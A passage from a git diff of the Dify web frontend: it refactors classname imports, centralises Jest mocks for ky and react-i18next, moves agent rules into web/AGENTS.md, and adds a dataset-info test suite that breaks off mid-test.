[ici](https://docs.dify.ai/getting-started/readme/model-providers). ![providers-v5](https://github.com/langgenius/dify/assets/13230914/5a17bdbe-097a-4100-8363-40255b70f6e3) @@ -79,7 +79,7 @@ Interface intuitive pour créer des prompts, comparer les performances des modè Des capacités RAG étendues qui couvrent tout, de l'ingestion de documents à la récupération, avec un support prêt à l'emploi pour l'extraction de texte à partir de PDF, PPT et autres formats de document courants. **5. Capacités d'agent** : -Vous pouvez définir des agents basés sur l'appel de fonction LLM ou ReAct, et ajouter des outils pré-construits ou personnalisés pour l'agent. Dify fournit plus de 50 outils intégrés pour les agents d'IA, tels que la recherche Google, DALL·E, Stable Diffusion et WolframAlpha. +Vous pouvez définir des agents basés sur l'appel de fonctions LLM ou ReAct, et ajouter des outils pré-construits ou personnalisés pour l'agent. Dify fournit plus de 50 outils intégrés pour les agents d'IA, tels que la recherche Google, DALL·E, Stable Diffusion et WolframAlpha. **6.
LLMOps** : Surveillez et analysez les journaux d'application et les performances au fil du temps. Vous pouvez continuellement améliorer les prompts, les ensembles de données et les modèles en fonction des données de production et des annotations. diff --git a/.cursorrules b/web/AGENTS.md similarity index 61% rename from .cursorrules rename to web/AGENTS.md index cdfb8b17a3..7362cd51db 100644 --- a/.cursorrules +++ b/web/AGENTS.md @@ -1,6 +1,5 @@ -# Cursor Rules for Dify Project - ## Automated Test Generation - Use `web/testing/testing.md` as the canonical instruction set for generating frontend automated tests. - When proposing or saving tests, re-read that document and follow every requirement. +- All frontend tests MUST also comply with the `frontend-testing` skill. Treat the skill as a mandatory constraint, not optional guidance. diff --git a/web/CLAUDE.md b/web/CLAUDE.md new file mode 120000 index 0000000000..47dc3e3d86 --- /dev/null +++ b/web/CLAUDE.md @@ -0,0 +1 @@ +AGENTS.md \ No newline at end of file diff --git a/web/__mocks__/ky.ts b/web/__mocks__/ky.ts new file mode 100644 index 0000000000..6c7691f2cf --- /dev/null +++ b/web/__mocks__/ky.ts @@ -0,0 +1,71 @@ +/** + * Mock for ky HTTP client + * This mock is used to avoid ESM issues in Jest tests + */ + +type KyResponse = { + ok: boolean + status: number + statusText: string + headers: Headers + json: jest.Mock + text: jest.Mock + blob: jest.Mock + arrayBuffer: jest.Mock + clone: jest.Mock +} + +type KyInstance = jest.Mock & { + get: jest.Mock + post: jest.Mock + put: jest.Mock + patch: jest.Mock + delete: jest.Mock + head: jest.Mock + create: jest.Mock + extend: jest.Mock + stop: symbol +} + +const createResponse = (data: unknown = {}, status = 200): KyResponse => { + const response: KyResponse = { + ok: status >= 200 && status < 300, + status, + statusText: status === 200 ? 
'OK' : 'Error', + headers: new Headers(), + json: jest.fn().mockResolvedValue(data), + text: jest.fn().mockResolvedValue(JSON.stringify(data)), + blob: jest.fn().mockResolvedValue(new Blob()), + arrayBuffer: jest.fn().mockResolvedValue(new ArrayBuffer(0)), + clone: jest.fn(), + } + // Ensure clone returns a new response-like object, not the same instance + response.clone.mockImplementation(() => createResponse(data, status)) + return response +} + +const createKyInstance = (): KyInstance => { + const instance = jest.fn().mockImplementation(() => Promise.resolve(createResponse())) as KyInstance + + // HTTP methods + instance.get = jest.fn().mockImplementation(() => Promise.resolve(createResponse())) + instance.post = jest.fn().mockImplementation(() => Promise.resolve(createResponse())) + instance.put = jest.fn().mockImplementation(() => Promise.resolve(createResponse())) + instance.patch = jest.fn().mockImplementation(() => Promise.resolve(createResponse())) + instance.delete = jest.fn().mockImplementation(() => Promise.resolve(createResponse())) + instance.head = jest.fn().mockImplementation(() => Promise.resolve(createResponse())) + + // Create new instance with custom options + instance.create = jest.fn().mockImplementation(() => createKyInstance()) + instance.extend = jest.fn().mockImplementation(() => createKyInstance()) + + // Stop method for AbortController + instance.stop = Symbol('stop') + + return instance +} + +const ky = createKyInstance() + +export default ky +export { ky } diff --git a/web/__mocks__/react-i18next.ts b/web/__mocks__/react-i18next.ts new file mode 100644 index 0000000000..1e3f58927e --- /dev/null +++ b/web/__mocks__/react-i18next.ts @@ -0,0 +1,40 @@ +/** + * Shared mock for react-i18next + * + * Jest automatically uses this mock when react-i18next is imported in tests. + * The default behavior returns the translation key as-is, which is suitable + * for most test scenarios. 
+ * + * For tests that need custom translations, you can override with jest.mock(): + * + * @example + * jest.mock('react-i18next', () => ({ + * useTranslation: () => ({ + * t: (key: string) => { + * if (key === 'some.key') return 'Custom translation' + * return key + * }, + * }), + * })) + */ + +export const useTranslation = () => ({ + t: (key: string, options?: Record) => { + if (options?.returnObjects) + return [`${key}-feature-1`, `${key}-feature-2`] + if (options) + return `${key}:${JSON.stringify(options)}` + return key + }, + i18n: { + language: 'en', + changeLanguage: jest.fn(), + }, +}) + +export const Trans = ({ children }: { children?: React.ReactNode }) => children + +export const initReactI18next = { + type: '3rdParty', + init: jest.fn(), +} diff --git a/web/__tests__/embedded-user-id-auth.test.tsx b/web/__tests__/embedded-user-id-auth.test.tsx index 5c3c3c943f..9d6734b120 100644 --- a/web/__tests__/embedded-user-id-auth.test.tsx +++ b/web/__tests__/embedded-user-id-auth.test.tsx @@ -4,12 +4,6 @@ import { fireEvent, render, screen, waitFor } from '@testing-library/react' import MailAndPasswordAuth from '@/app/(shareLayout)/webapp-signin/components/mail-and-password-auth' import CheckCode from '@/app/(shareLayout)/webapp-signin/check-code/page' -jest.mock('react-i18next', () => ({ - useTranslation: () => ({ - t: (key: string) => key, - }), -})) - const replaceMock = jest.fn() const backMock = jest.fn() diff --git a/web/__tests__/goto-anything/command-selector.test.tsx b/web/__tests__/goto-anything/command-selector.test.tsx index 6d4e045d49..e502c533bb 100644 --- a/web/__tests__/goto-anything/command-selector.test.tsx +++ b/web/__tests__/goto-anything/command-selector.test.tsx @@ -4,12 +4,6 @@ import '@testing-library/jest-dom' import CommandSelector from '../../app/components/goto-anything/command-selector' import type { ActionItem } from '../../app/components/goto-anything/actions/types' -jest.mock('react-i18next', () => ({ - useTranslation: () => ({ - 
t: (key: string) => key, - }), -})) - jest.mock('cmdk', () => ({ Command: { Group: ({ children, className }: any) =>
{children}
, diff --git a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/layout-main.tsx b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/layout-main.tsx index 1f836de6e6..d5e3c61932 100644 --- a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/layout-main.tsx +++ b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/layout-main.tsx @@ -16,7 +16,7 @@ import { import { useTranslation } from 'react-i18next' import { useShallow } from 'zustand/react/shallow' import s from './style.module.css' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { useStore } from '@/app/components/app/store' import AppSideBar from '@/app/components/app-sidebar' import type { NavIcon } from '@/app/components/app-sidebar/navLink' diff --git a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/time-range-picker/date-picker.tsx b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/time-range-picker/date-picker.tsx index 2bfdece433..dda5dff2b9 100644 --- a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/time-range-picker/date-picker.tsx +++ b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/time-range-picker/date-picker.tsx @@ -3,7 +3,7 @@ import { RiCalendarLine } from '@remixicon/react' import type { Dayjs } from 'dayjs' import type { FC } from 'react' import React, { useCallback } from 'react' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { formatToLocalTime } from '@/utils/format' import { useI18N } from '@/context/i18n' import Picker from '@/app/components/base/date-and-time-picker/date-picker' diff --git a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/time-range-picker/range-selector.tsx b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/time-range-picker/range-selector.tsx index f99ea52492..0a80bf670d 100644 --- a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/time-range-picker/range-selector.tsx +++ 
b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/time-range-picker/range-selector.tsx @@ -6,7 +6,7 @@ import { SimpleSelect } from '@/app/components/base/select' import type { Item } from '@/app/components/base/select' import dayjs from 'dayjs' import { RiArrowDownSLine, RiCheckLine } from '@remixicon/react' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { useTranslation } from 'react-i18next' const today = dayjs() diff --git a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/__tests__/svg-attribute-error-reproduction.spec.tsx b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/__tests__/svg-attribute-error-reproduction.spec.tsx index b1e915b2bf..374dbff203 100644 --- a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/__tests__/svg-attribute-error-reproduction.spec.tsx +++ b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/__tests__/svg-attribute-error-reproduction.spec.tsx @@ -3,13 +3,6 @@ import { render } from '@testing-library/react' import '@testing-library/jest-dom' import { OpikIconBig } from '@/app/components/base/icons/src/public/tracing' -// Mock dependencies to isolate the SVG rendering issue -jest.mock('react-i18next', () => ({ - useTranslation: () => ({ - t: (key: string) => key, - }), -})) - describe('SVG Attribute Error Reproduction', () => { // Capture console errors const originalError = console.error diff --git a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/config-button.tsx b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/config-button.tsx index 246a1eb6a3..17c919bf22 100644 --- a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/config-button.tsx +++ b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/config-button.tsx @@ -4,7 +4,7 @@ import React, { useCallback, useRef, useState } from 'react' import type { PopupProps } from 
'./config-popup' import ConfigPopup from './config-popup' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { PortalToFollowElem, PortalToFollowElemContent, diff --git a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/config-popup.tsx b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/config-popup.tsx index 628eb13071..767ccb8c59 100644 --- a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/config-popup.tsx +++ b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/config-popup.tsx @@ -12,7 +12,7 @@ import Indicator from '@/app/components/header/indicator' import Switch from '@/app/components/base/switch' import Tooltip from '@/app/components/base/tooltip' import Divider from '@/app/components/base/divider' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' const I18N_PREFIX = 'app.tracing' diff --git a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/field.tsx b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/field.tsx index eecd356e08..e170159e35 100644 --- a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/field.tsx +++ b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/field.tsx @@ -1,7 +1,7 @@ 'use client' import type { FC } from 'react' import React from 'react' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import Input from '@/app/components/base/input' type Props = { diff --git a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/panel.tsx b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/panel.tsx index 2c17931b83..319ff3f423 100644 --- a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/panel.tsx +++ b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/panel.tsx @@ -12,7 +12,7 @@ import type { AliyunConfig, ArizeConfig, 
DatabricksConfig, LangFuseConfig, LangS import { TracingProvider } from './type' import TracingIcon from './tracing-icon' import ConfigButton from './config-button' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { AliyunIcon, ArizeIcon, DatabricksIcon, LangfuseIcon, LangsmithIcon, MlflowIcon, OpikIcon, PhoenixIcon, TencentIcon, WeaveIcon } from '@/app/components/base/icons/src/public/tracing' import Indicator from '@/app/components/header/indicator' import { fetchTracingConfig as doFetchTracingConfig, fetchTracingStatus, updateTracingStatus } from '@/service/apps' diff --git a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/provider-panel.tsx b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/provider-panel.tsx index ac1704d60d..0779689c76 100644 --- a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/provider-panel.tsx +++ b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/provider-panel.tsx @@ -6,7 +6,7 @@ import { } from '@remixicon/react' import { useTranslation } from 'react-i18next' import { TracingProvider } from './type' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { AliyunIconBig, ArizeIconBig, DatabricksIconBig, LangfuseIconBig, LangsmithIconBig, MlflowIconBig, OpikIconBig, PhoenixIconBig, TencentIconBig, WeaveIconBig } from '@/app/components/base/icons/src/public/tracing' import { Eye as View } from '@/app/components/base/icons/src/vender/solid/general' diff --git a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/tracing-icon.tsx b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/tracing-icon.tsx index ec9117dd38..aeca1cd3ab 100644 --- a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/tracing-icon.tsx +++ b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/tracing-icon.tsx @@ -1,7 +1,7 @@ 'use client' import 
type { FC } from 'react' import React from 'react' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { TracingIcon as Icon } from '@/app/components/base/icons/src/public/tracing' type Props = { diff --git a/web/app/(commonLayout)/datasets/(datasetDetailLayout)/[datasetId]/layout-main.tsx b/web/app/(commonLayout)/datasets/(datasetDetailLayout)/[datasetId]/layout-main.tsx index 3effb79f20..3581587b54 100644 --- a/web/app/(commonLayout)/datasets/(datasetDetailLayout)/[datasetId]/layout-main.tsx +++ b/web/app/(commonLayout)/datasets/(datasetDetailLayout)/[datasetId]/layout-main.tsx @@ -23,7 +23,7 @@ import { useDatasetDetail, useDatasetRelatedApps } from '@/service/knowledge/use import useDocumentTitle from '@/hooks/use-document-title' import ExtraInfo from '@/app/components/datasets/extra-info' import { useEventEmitterContextContext } from '@/context/event-emitter' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' export type IAppDetailLayoutProps = { children: React.ReactNode diff --git a/web/app/(shareLayout)/webapp-reset-password/layout.tsx b/web/app/(shareLayout)/webapp-reset-password/layout.tsx index e0ac6b9ad6..13073b0e6a 100644 --- a/web/app/(shareLayout)/webapp-reset-password/layout.tsx +++ b/web/app/(shareLayout)/webapp-reset-password/layout.tsx @@ -1,7 +1,7 @@ 'use client' import Header from '@/app/signin/_header' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { useGlobalPublicStore } from '@/context/global-public-context' export default function SignInLayout({ children }: any) { diff --git a/web/app/(shareLayout)/webapp-reset-password/set-password/page.tsx b/web/app/(shareLayout)/webapp-reset-password/set-password/page.tsx index 5e3f6fff1d..843f10e039 100644 --- a/web/app/(shareLayout)/webapp-reset-password/set-password/page.tsx +++ b/web/app/(shareLayout)/webapp-reset-password/set-password/page.tsx @@ -2,7 +2,7 @@ import { useCallback, useState } from 
'react' import { useTranslation } from 'react-i18next' import { useRouter, useSearchParams } from 'next/navigation' -import cn from 'classnames' +import { cn } from '@/utils/classnames' import { RiCheckboxCircleFill } from '@remixicon/react' import { useCountDown } from 'ahooks' import Button from '@/app/components/base/button' diff --git a/web/app/(shareLayout)/webapp-signin/layout.tsx b/web/app/(shareLayout)/webapp-signin/layout.tsx index 7649982072..c75f925d40 100644 --- a/web/app/(shareLayout)/webapp-signin/layout.tsx +++ b/web/app/(shareLayout)/webapp-signin/layout.tsx @@ -1,6 +1,6 @@ 'use client' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { useGlobalPublicStore } from '@/context/global-public-context' import useDocumentTitle from '@/hooks/use-document-title' import type { PropsWithChildren } from 'react' diff --git a/web/app/(shareLayout)/webapp-signin/normalForm.tsx b/web/app/(shareLayout)/webapp-signin/normalForm.tsx index 219722eef3..a14bfcd737 100644 --- a/web/app/(shareLayout)/webapp-signin/normalForm.tsx +++ b/web/app/(shareLayout)/webapp-signin/normalForm.tsx @@ -7,7 +7,7 @@ import Loading from '@/app/components/base/loading' import MailAndCodeAuth from './components/mail-and-code-auth' import MailAndPasswordAuth from './components/mail-and-password-auth' import SSOAuth from './components/sso-auth' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { LicenseStatus } from '@/types/feature' import { IS_CE_EDITION } from '@/config' import { useGlobalPublicStore } from '@/context/global-public-context' diff --git a/web/app/account/oauth/authorize/layout.tsx b/web/app/account/oauth/authorize/layout.tsx index 2ab676d6b6..b70ab210d0 100644 --- a/web/app/account/oauth/authorize/layout.tsx +++ b/web/app/account/oauth/authorize/layout.tsx @@ -1,7 +1,7 @@ 'use client' import Header from '@/app/signin/_header' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' 
import { useGlobalPublicStore } from '@/context/global-public-context' import useDocumentTitle from '@/hooks/use-document-title' import { AppContextProvider } from '@/context/app-context' diff --git a/web/app/activate/activateForm.tsx b/web/app/activate/activateForm.tsx index d9d07cbfa1..11fc4866f3 100644 --- a/web/app/activate/activateForm.tsx +++ b/web/app/activate/activateForm.tsx @@ -1,13 +1,13 @@ 'use client' +import { useEffect } from 'react' import { useTranslation } from 'react-i18next' -import useSWR from 'swr' import { useRouter, useSearchParams } from 'next/navigation' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import Button from '@/app/components/base/button' -import { invitationCheck } from '@/service/common' import Loading from '@/app/components/base/loading' import useDocumentTitle from '@/hooks/use-document-title' +import { useInvitationCheck } from '@/service/use-common' const ActivateForm = () => { useDocumentTitle('') @@ -26,19 +26,21 @@ const ActivateForm = () => { token, }, } - const { data: checkRes } = useSWR(checkParams, invitationCheck, { - revalidateOnFocus: false, - onSuccess(data) { - if (data.is_valid) { - const params = new URLSearchParams(searchParams) - const { email, workspace_id } = data.data - params.set('email', encodeURIComponent(email)) - params.set('workspace_id', encodeURIComponent(workspace_id)) - params.set('invite_token', encodeURIComponent(token as string)) - router.replace(`/signin?${params.toString()}`) - } - }, - }) + const { data: checkRes } = useInvitationCheck({ + ...checkParams.params, + token: token || undefined, + }, true) + + useEffect(() => { + if (checkRes?.is_valid) { + const params = new URLSearchParams(searchParams) + const { email, workspace_id } = checkRes.data + params.set('email', encodeURIComponent(email)) + params.set('workspace_id', encodeURIComponent(workspace_id)) + params.set('invite_token', encodeURIComponent(token as string)) + 
router.replace(`/signin?${params.toString()}`) + } + }, [checkRes, router, searchParams, token]) return (
{ diff --git a/web/app/components/app-sidebar/app-info.tsx b/web/app/components/app-sidebar/app-info.tsx index f143c2fcef..1b4377c10a 100644 --- a/web/app/components/app-sidebar/app-info.tsx +++ b/web/app/components/app-sidebar/app-info.tsx @@ -29,7 +29,7 @@ import CardView from '@/app/(commonLayout)/app/(appDetailLayout)/[appId]/overvie import type { Operation } from './app-operations' import AppOperations from './app-operations' import dynamic from 'next/dynamic' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { AppModeEnum } from '@/types/app' const SwitchAppModal = dynamic(() => import('@/app/components/app/switch-app-modal'), { diff --git a/web/app/components/app-sidebar/app-sidebar-dropdown.tsx b/web/app/components/app-sidebar/app-sidebar-dropdown.tsx index 3c5d38dd82..04634906af 100644 --- a/web/app/components/app-sidebar/app-sidebar-dropdown.tsx +++ b/web/app/components/app-sidebar/app-sidebar-dropdown.tsx @@ -16,7 +16,7 @@ import AppInfo from './app-info' import NavLink from './navLink' import { useStore as useAppStore } from '@/app/components/app/store' import type { NavIcon } from './navLink' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { AppModeEnum } from '@/types/app' type Props = { diff --git a/web/app/components/app-sidebar/dataset-info/dropdown.tsx b/web/app/components/app-sidebar/dataset-info/dropdown.tsx index ff110f70bd..dc46af2d02 100644 --- a/web/app/components/app-sidebar/dataset-info/dropdown.tsx +++ b/web/app/components/app-sidebar/dataset-info/dropdown.tsx @@ -2,7 +2,7 @@ import React, { useCallback, useState } from 'react' import { PortalToFollowElem, PortalToFollowElemContent, PortalToFollowElemTrigger } from '../../base/portal-to-follow-elem' import ActionButton from '../../base/action-button' import { RiMoreFill } from '@remixicon/react' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import Menu from './menu' import { useSelector 
as useAppContextWithSelector } from '@/context/app-context' import { useDatasetDetailContextWithSelector } from '@/context/dataset-detail' diff --git a/web/app/components/app-sidebar/dataset-info/index.spec.tsx b/web/app/components/app-sidebar/dataset-info/index.spec.tsx new file mode 100644 index 0000000000..3674be6658 --- /dev/null +++ b/web/app/components/app-sidebar/dataset-info/index.spec.tsx @@ -0,0 +1,379 @@ +import React from 'react' +import { render, screen, waitFor } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import DatasetInfo from './index' +import Dropdown from './dropdown' +import Menu from './menu' +import MenuItem from './menu-item' +import type { DataSet } from '@/models/datasets' +import { + ChunkingMode, + DataSourceType, + DatasetPermission, +} from '@/models/datasets' +import { RETRIEVE_METHOD } from '@/types/app' +import { RiEditLine } from '@remixicon/react' + +let mockDataset: DataSet +let mockIsDatasetOperator = false +const mockReplace = jest.fn() +const mockInvalidDatasetList = jest.fn() +const mockInvalidDatasetDetail = jest.fn() +const mockExportPipeline = jest.fn() +const mockCheckIsUsedInApp = jest.fn() +const mockDeleteDataset = jest.fn() + +const createDataset = (overrides: Partial = {}): DataSet => ({ + id: 'dataset-1', + name: 'Dataset Name', + indexing_status: 'completed', + icon_info: { + icon: '📙', + icon_background: '#FFF4ED', + icon_type: 'emoji', + icon_url: '', + }, + description: 'Dataset description', + permission: DatasetPermission.onlyMe, + data_source_type: DataSourceType.FILE, + indexing_technique: 'high_quality' as DataSet['indexing_technique'], + created_by: 'user-1', + updated_by: 'user-1', + updated_at: 1690000000, + app_count: 0, + doc_form: ChunkingMode.text, + document_count: 1, + total_document_count: 1, + word_count: 1000, + provider: 'internal', + embedding_model: 'text-embedding-3', + embedding_model_provider: 'openai', + embedding_available: true, + 
retrieval_model_dict: { + search_method: RETRIEVE_METHOD.semantic, + reranking_enable: false, + reranking_model: { + reranking_provider_name: '', + reranking_model_name: '', + }, + top_k: 5, + score_threshold_enabled: false, + score_threshold: 0, + }, + retrieval_model: { + search_method: RETRIEVE_METHOD.semantic, + reranking_enable: false, + reranking_model: { + reranking_provider_name: '', + reranking_model_name: '', + }, + top_k: 5, + score_threshold_enabled: false, + score_threshold: 0, + }, + tags: [], + external_knowledge_info: { + external_knowledge_id: '', + external_knowledge_api_id: '', + external_knowledge_api_name: '', + external_knowledge_api_endpoint: '', + }, + external_retrieval_model: { + top_k: 0, + score_threshold: 0, + score_threshold_enabled: false, + }, + built_in_field_enabled: false, + runtime_mode: 'rag_pipeline', + enable_api: false, + is_multimodal: false, + ...overrides, +}) + +jest.mock('next/navigation', () => ({ + useRouter: () => ({ + replace: mockReplace, + }), +})) + +jest.mock('@/context/dataset-detail', () => ({ + useDatasetDetailContextWithSelector: (selector: (state: { dataset?: DataSet }) => unknown) => selector({ dataset: mockDataset }), +})) + +jest.mock('@/context/app-context', () => ({ + useSelector: (selector: (state: { isCurrentWorkspaceDatasetOperator: boolean }) => unknown) => + selector({ isCurrentWorkspaceDatasetOperator: mockIsDatasetOperator }), +})) + +jest.mock('@/service/knowledge/use-dataset', () => ({ + datasetDetailQueryKeyPrefix: ['dataset', 'detail'], + useInvalidDatasetList: () => mockInvalidDatasetList, +})) + +jest.mock('@/service/use-base', () => ({ + useInvalid: () => mockInvalidDatasetDetail, +})) + +jest.mock('@/service/use-pipeline', () => ({ + useExportPipelineDSL: () => ({ + mutateAsync: mockExportPipeline, + }), +})) + +jest.mock('@/service/datasets', () => ({ + checkIsUsedInApp: (...args: unknown[]) => mockCheckIsUsedInApp(...args), + deleteDataset: (...args: unknown[]) => 
mockDeleteDataset(...args), +})) + +jest.mock('@/hooks/use-knowledge', () => ({ + useKnowledge: () => ({ + formatIndexingTechniqueAndMethod: () => 'indexing-technique', + }), +})) + +jest.mock('@/app/components/datasets/rename-modal', () => ({ + __esModule: true, + default: ({ + show, + onClose, + onSuccess, + }: { + show: boolean + onClose: () => void + onSuccess?: () => void + }) => { + if (!show) + return null + return ( +
+ + +
+ ) + }, +})) + +const openMenu = async (user: ReturnType) => { + const trigger = screen.getByRole('button') + await user.click(trigger) +} + +describe('DatasetInfo', () => { + beforeEach(() => { + jest.clearAllMocks() + mockDataset = createDataset() + mockIsDatasetOperator = false + }) + + // Rendering of dataset summary details based on expand and dataset state. + describe('Rendering', () => { + it('should show dataset details when expanded', () => { + // Arrange + mockDataset = createDataset({ is_published: true }) + render() + + // Assert + expect(screen.getByText('Dataset Name')).toBeInTheDocument() + expect(screen.getByText('Dataset description')).toBeInTheDocument() + expect(screen.getByText('dataset.chunkingMode.general')).toBeInTheDocument() + expect(screen.getByText('indexing-technique')).toBeInTheDocument() + }) + + it('should show external tag when provider is external', () => { + // Arrange + mockDataset = createDataset({ provider: 'external', is_published: false }) + render() + + // Assert + expect(screen.getByText('dataset.externalTag')).toBeInTheDocument() + expect(screen.queryByText('dataset.chunkingMode.general')).not.toBeInTheDocument() + }) + + it('should hide detailed fields when collapsed', () => { + // Arrange + render() + + // Assert + expect(screen.queryByText('Dataset Name')).not.toBeInTheDocument() + expect(screen.queryByText('Dataset description')).not.toBeInTheDocument() + }) + }) +}) + +describe('MenuItem', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + // Event handling for menu item interactions. 
+ describe('Interactions', () => { + it('should call handler when clicked', async () => { + const user = userEvent.setup() + const handleClick = jest.fn() + // Arrange + render() + + // Act + await user.click(screen.getByText('Edit')) + + // Assert + expect(handleClick).toHaveBeenCalledTimes(1) + }) + }) +}) + +describe('Menu', () => { + beforeEach(() => { + jest.clearAllMocks() + mockDataset = createDataset() + }) + + // Rendering of menu options based on runtime mode and delete visibility. + describe('Rendering', () => { + it('should show edit, export, and delete options when rag pipeline and deletable', () => { + // Arrange + mockDataset = createDataset({ runtime_mode: 'rag_pipeline' }) + render( + , + ) + + // Assert + expect(screen.getByText('common.operation.edit')).toBeInTheDocument() + expect(screen.getByText('datasetPipeline.operations.exportPipeline')).toBeInTheDocument() + expect(screen.getByText('common.operation.delete')).toBeInTheDocument() + }) + + it('should hide export and delete options when not rag pipeline and not deletable', () => { + // Arrange + mockDataset = createDataset({ runtime_mode: 'general' }) + render( + , + ) + + // Assert + expect(screen.getByText('common.operation.edit')).toBeInTheDocument() + expect(screen.queryByText('datasetPipeline.operations.exportPipeline')).not.toBeInTheDocument() + expect(screen.queryByText('common.operation.delete')).not.toBeInTheDocument() + }) + }) +}) + +describe('Dropdown', () => { + beforeEach(() => { + jest.clearAllMocks() + mockDataset = createDataset({ pipeline_id: 'pipeline-1', runtime_mode: 'rag_pipeline' }) + mockIsDatasetOperator = false + mockExportPipeline.mockResolvedValue({ data: 'pipeline-content' }) + mockCheckIsUsedInApp.mockResolvedValue({ is_using: false }) + mockDeleteDataset.mockResolvedValue({}) + if (!('createObjectURL' in URL)) { + Object.defineProperty(URL, 'createObjectURL', { + value: jest.fn(), + writable: true, + }) + } + if (!('revokeObjectURL' in URL)) { + 
Object.defineProperty(URL, 'revokeObjectURL', { + value: jest.fn(), + writable: true, + }) + } + }) + + // Rendering behavior based on workspace role. + describe('Rendering', () => { + it('should hide delete option when user is dataset operator', async () => { + const user = userEvent.setup() + // Arrange + mockIsDatasetOperator = true + render() + + // Act + await openMenu(user) + + // Assert + expect(screen.queryByText('common.operation.delete')).not.toBeInTheDocument() + }) + }) + + // User interactions that trigger modals and exports. + describe('Interactions', () => { + it('should open rename modal when edit is clicked', async () => { + const user = userEvent.setup() + // Arrange + render() + + // Act + await openMenu(user) + await user.click(screen.getByText('common.operation.edit')) + + // Assert + expect(screen.getByTestId('rename-modal')).toBeInTheDocument() + }) + + it('should export pipeline when export is clicked', async () => { + const user = userEvent.setup() + const anchorClickSpy = jest.spyOn(HTMLAnchorElement.prototype, 'click') + const createObjectURLSpy = jest.spyOn(URL, 'createObjectURL') + // Arrange + render() + + // Act + await openMenu(user) + await user.click(screen.getByText('datasetPipeline.operations.exportPipeline')) + + // Assert + await waitFor(() => { + expect(mockExportPipeline).toHaveBeenCalledWith({ + pipelineId: 'pipeline-1', + include: false, + }) + }) + expect(createObjectURLSpy).toHaveBeenCalledTimes(1) + expect(anchorClickSpy).toHaveBeenCalledTimes(1) + }) + + it('should show delete confirmation when delete is clicked', async () => { + const user = userEvent.setup() + // Arrange + render() + + // Act + await openMenu(user) + await user.click(screen.getByText('common.operation.delete')) + + // Assert + await waitFor(() => { + expect(screen.getByText('dataset.deleteDatasetConfirmContent')).toBeInTheDocument() + }) + }) + + it('should delete dataset and redirect when confirm is clicked', async () => { + const user = 
